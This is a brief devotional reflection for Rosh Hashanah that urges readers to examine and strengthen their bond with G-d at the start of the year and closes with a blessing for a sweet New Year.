Rosh Hashanah is the time to consider, that we as human beings certainly did not make ourselves. The universe surely did not make itself. This is the time to think of our connection with the true source of all and re-establish our bonds with G-d. Have we done things to block and sever our ties, are there areas that can use improvement to strengthen our attachment with G-d? Have we invited the supreme sovereign of the Universe who certainly has all the powers to do as he pleases, into our lives? On a daily basis?? Not a second can go by, when we don’t need G-ds ever watchful eye over us.


“As we begin the year, so it goes.” May we all merit the awareness of G-d upon us all the time. That will be our blessing for a most elevated and blessed sweet New Year.